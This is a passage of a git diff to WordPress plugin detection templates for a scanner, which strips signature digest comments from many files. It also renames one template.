a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index c7f738b24a..e7e7c27682 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220492ccae6d40f497ea5a5b00b174666a3972c16cf5a8a6b71506fd724c3b5e00902207766291ce496a22f7360ec2edb816a7ebc3501f94abc2d9979d52482746cc41b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 14455b8252..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022006551632ea8f4db53d2999482070dc8056227d0c88b7284343aa283ed0369b12022100d866b591828332f8a89bfbe1462867f961be5a9639d06546651b3a8eb8defce3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 53ee2b0664..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022073be6357d17634ca159c6862fd367dcbbd7af2919cbac3323e4166e712513c2902204d4336c960a9b77fda3f9897f6e752d976c5584df54b81869562e589ad339fee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index c1975a2d7d..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022010bea65701ee27bd82423bbdfec579f2b5614fdc447184d3a0e468f41641c23a022100d68ce2121c07ee7fa4980d2bff182cb9241024eca300f84772f468c674d1c524:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index a888f23eef..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b94a4acf3e12f4727ca0943ce7cab493f7eba516ee3c4980df4cbc392473eb04022004cd090307064cbfa4a6d05c6bd63bfc94cd94899d87b0ba48abab653d0876da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 66a9eea197..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dc5426805b5293dc87b651b21361368b93a9b8fdce5210b3e3ef15c56cc5c3fc02206a6e99179fa00de3786cb3368bed7dd263cd47289ff418a7bd35995d32a5fa2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index 9d778fc83c..c20ed6552a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e520ee8d0520bc7a5e38411359be74b0e6d02d6bec8bc6b906a15f32e0a0b99e022100a120e8addd00577b4af13b051442c5b390e5c3a2b34c5607b7ac870276cd9c80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 20ebeee95a..6ac2212b4b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008cbcf953304d3966efae0278c2a039c2d2d5f0636b40a6b78f646de65d5a60e602203a2d653fed437934bdcd2e37f790719b4cb1792f2a5bce5a482ba4a6416a8a0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 33610cdee4..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022058e55eea02ea9780ea4ba23146a58d2d50ab50289b9203fdca86c48c6bbcb1f902204958c8c47f888dff201bcfa96cfcc572c2e5f05644f0e44acb71890476612489:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index fed08f1e08..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008c2c638fa4a623eefa9fbf8508c3c5cde857c8f2214a4077e340d92d129b8b1c022075a96aeb1f678ab863232f09d95f735e60678744c9068c04d211ffb3c9ebecaa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index d8ecc03a14..38391bd9f3 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220038e81775071471f6244c5f2dfe27aad7c0749729311c69c32b5eacbb476810102200b2ab5af23bec15ee366067715a484fa5a5aee46709958b4d007ba0034929390:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 481440773a..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e32d99fec3109c7f1908ecc913f05ec257e17dfde4d49ee59d9a948e50e533c9022100aefde97b4aafce6320cb430aed45b3520459f0a1fec41de938a450ba325edf99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 1f379765c4..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206229834af53d186074e0ef38d4efff4c7d022c6f1c36aea300b9326723db7b3d02206be14c131a9be07cdfc4ce5e6f54f74c6d830ca3648aa77779657dfc19283b9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 1b931e20f6..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c673104b82f1f63bff85085dc26e2d4a29c1946e1dac53badf2aff74a67d6f59022100e6d1423eb97a61c416aee183d2f572b32a37d147033ff5f4395d01a1a7482d3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index a35fbad9f1..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022033d48ebeed69bd2fcc64cc6878bffb431c9f508f7c7dfe2e56177710fb4417d102206d5b490bb367daea0df16e151d493c99ebbffd01262f081e88dd64129955448f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index dc952ad484..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a21a145b17804f2a422e2a48040fe19642d182e7797a0797d2942b49e6f19713022057368ae02fd0fc59a63950a00138e2bdf2c0171ab08656abc8b5dcc3d0c41466:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index a0374923c5..2b29428cf1 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -1,7 +1,7 @@ id: wordpress-updraftplus info: - name: UpdraftPlus' WordPress Backup & Migration Plugin Detection + name: UpdraftPlus' WP Backup & Migration Plugin Detection author: ricardomaia severity: info reference: @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c94d4d8dd6501eca9acf876438040fda5cd605a87cf2f6f0ef07b8648c2be921022046cf863b83724cb15f99eab4b79b36d86af3d7f8c39ea4f29414cc05f3f08fae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 0310b9a492..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100efd5cde0b5afecd65f980e382dda7025dd0212d3a128ca16f1dc44428edb35fc022056f4516f3102ba0e02b4b856d63e1bf7cb53c5b6ecea0914b4b6c39af1758ad2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index ebab153099..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220016e618ef353820f93a8a51b650cc1532e076800e01b14481aefb6c1f6628b08022100ae1835e1fefd7bd87f0ec3088844f5286c4be0113ea419f814fd55a4ce72eff7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 41ba734e69..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220647c84c474911482afda0eea0c325eaf0391f85c04aa3eb8361e552e24b98267022033a8ceee18ca3187a62c5e8c620c4bc773e1caabc9c61f9ddd638714ad735b43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 2d4c6d1f4e..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203a8d74f69398ff83314b673ec62bb2073a0fe9126841c7e829e3a1ffef0432e5022100d7dad0a2787f444c6b971f346f5dcf62b8f4637a5fad7870fa7691f015f08471:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 294d24b32b..2ae6bafbba 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220311a593c2f9cc2f1ef262bc874455d45f94b752b83346bace45fde1c3cd85be302204aeb9cf7ff836835b03118032b2de1ef9c068582dce990324ff3a3caabfbe405:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 92700096e2..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203786682c0dcb5f6005f888b7bea718c453bab682cdab40b6072a6321875a5eb3022045a2bf52e559a92768d49356f6384a8b00f5daf2fe59ed2c5802d0eeee752257:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 999cd4c7a7..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022002b0545eca335e1cc42ce210b337991b24b01ed0b59f735ee862c90517fc65fd0220251a34850d220485225d14597d22789d25fdea0be384208cca7130fa8e8a9ae9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6afe10db65..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220418be0a3686a3b4047715ffe0ca038dd5700cf38b2769179f6984fb0dcd961fd022030b3068b251dfaccf0ffdff7f3d0f04f2133875d9f764901c6f5c166dd66c5ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index a570d5b40f..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022002d14973aaaf7e250778a21eb2dfe8e83b6fcb0960f20179e81ec297faef5eea02201b2551d5657b8d5e08785cad84b645e5fbafebe7270e0c183b86e995329d09a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index 06448d4756..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bf41f6f23f5974487dc6dff982426f8fdac00fea0dfd96d79a2afba0608bf429022077741c7f3cfc0bd757864a295c1640c8cc13c2814ef0ff830d3b4619c96c2751:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index a2bdd1ff1c..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203213376663758f8cd7d3e2fd0e31da619eafab0115d76d85ff30be1cfec93a48022100d9a54a0f1585072f6962a575371e71aa3744da5d72b6eebfcf52b4d0361d0249:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index d88f11373c..e83e8d79e7 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b0cd91aa946236bb7ef560b14a53209ccc7e9bb343a7a21d2454f631ac4f6c0302205a50fea784befae30e14ef473bc9318c312d2bab227ecfcf10679c3f45d9bca8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 755ffb7d40..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210099ae5969d74ecc06c100c0fe9acfdefad3f3b810ca772743c7f1403fe66be608022100fcdacfe5e539ae0a08011643ca41f9c517dd7cfb13fd52db8491435732668d3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 2e23accd62..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f206460803bcb38c9dd423880add2a223880e6f33e84202b6b7ed3e1d00c7977022100dbad63702b4f2476c6e5f52a6dd15458e0085771eb54bc0b1112424b424c1b27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 8ad50d77f0..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204d8059dafe563f137b7f96dfa60fc0d3fd1989ecca49364cbd55fac2868c5a2b02205c3e862c38d73186de15f43d933748b1564fba00f3c166df1a0fd04526fca79d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 54844ccc5d..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207dde9d2563112aa4a5e3fe34b59e1733e47842910ccf4eda6b2055e66cf1aaec0220655ad576c2a4455272fd413df1267ed8e3465eabb817db2cd4d5e90f3925abb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index abebdeee04..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e1cf883da953bd3fd08bb45190d73c9158d692600a654b8491244ee068dfc8200220783d25b4bd4b03417a19f8f18fc2a25f25acbf5d223b09e616350ef3734a37d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 9e54de5e1b..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022024fbc45a6a71b66ce9faac0b44cab3a2fba4418489df515c3613e95292fb904a022100d5156e8ab636e9bff2dcbefae5236213105353a58493453b1d8d0be696c0a109:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 6635a9df5b..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ac0f6d97dd86b0e82477090f0706b6083801664a4fbc5eb123b1326cd7a4be51022100c285453e8621c5549b84012535ebcb756242f0e74ec16a1dc408188dd9f6b12a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 5636b82b2d..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009b5fc2579c4621b83f797cbf8567fda4b81876373c3fbeb659e49c5a5e292e82022100e258938805da48cd9f835d47a6c0e88f785d05f5afe14ea8c198186a27944e0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 764720b922..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220237d675746bd9b30adeff5d2c2b3d11032a36536ce4bbef5ddde661bc724a905022100eb3d3db440f241e90dc749c189ed47be3a637a0fd6652af94f4b9a1c883026fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a194c53570..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c48846a9d66c7bf63327f7bc5de91cad0cb257b746a6c850f206017bc2645983022079e8b2d00ab644e71d79fb1a13d6e09071d782345904aed6f0c4a49613c93d4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index e0b7039079..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b3e88517cfba6fc0ffaab0b554a3f0d2189be8fa14eae0e889e140d70f1441f10221008efabce2f344ddcfa7316cb4dddf9929a7597751d3add6f6df5af0d3a0c144a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index c7608e841f..10dad2d2fb 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009acfffe644541f0a1e334f489ff4609b2a39579fe7bba2123a604d8d840ce2e70220474437a6851069b3c3fa09e19475cd6afc5604980ff77b75c04f1b98e2f42fd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index ebf3f40686..e9efe6fb53 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205d8d7dcee3e7c73354f9e70d1d3232dd6e024cdb580cadb1fdc3fea92f528634022100b76ca44505af6d4eb7d3397d1fdd9aa58162684109fa44f51af2ef5dc037416f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 528228b4f1..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ae5cb696e48318cb133af2c8367cf4935354179990933f06aa48c4f3200c1b8002207890dfc544f36b9099607406ab79f3296deae3605e799545e6bea3f95ab25a1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 303cc3ab4e..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100be6b8ffb76306f08243e5add5efb7f8c9622ba871a8bd70d5e7d154dae3de4fd0220191e5c24c38266492af683976728858b00e5ff9812629cc1cee6b2c7b6176c26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index b2d19d00d7..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022079cf1f611d3c6fb515663035980bcebc7bae4aef3b3eef51635162a54ffa6a09022100b0868081317bb1ea5ea3fe00f0767f8afb3719c1cd4028eb06cff09dbf1ca381:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 28e58b5227..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c8a404d10fb5c757173e3c832bf9fc48aca0b73d5beac8eaac157f58ed262b97022100a5ccf1342f9cb00d802bfa5cee29e16626d30e97a4d4493bee99f5b6a24ae744:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml 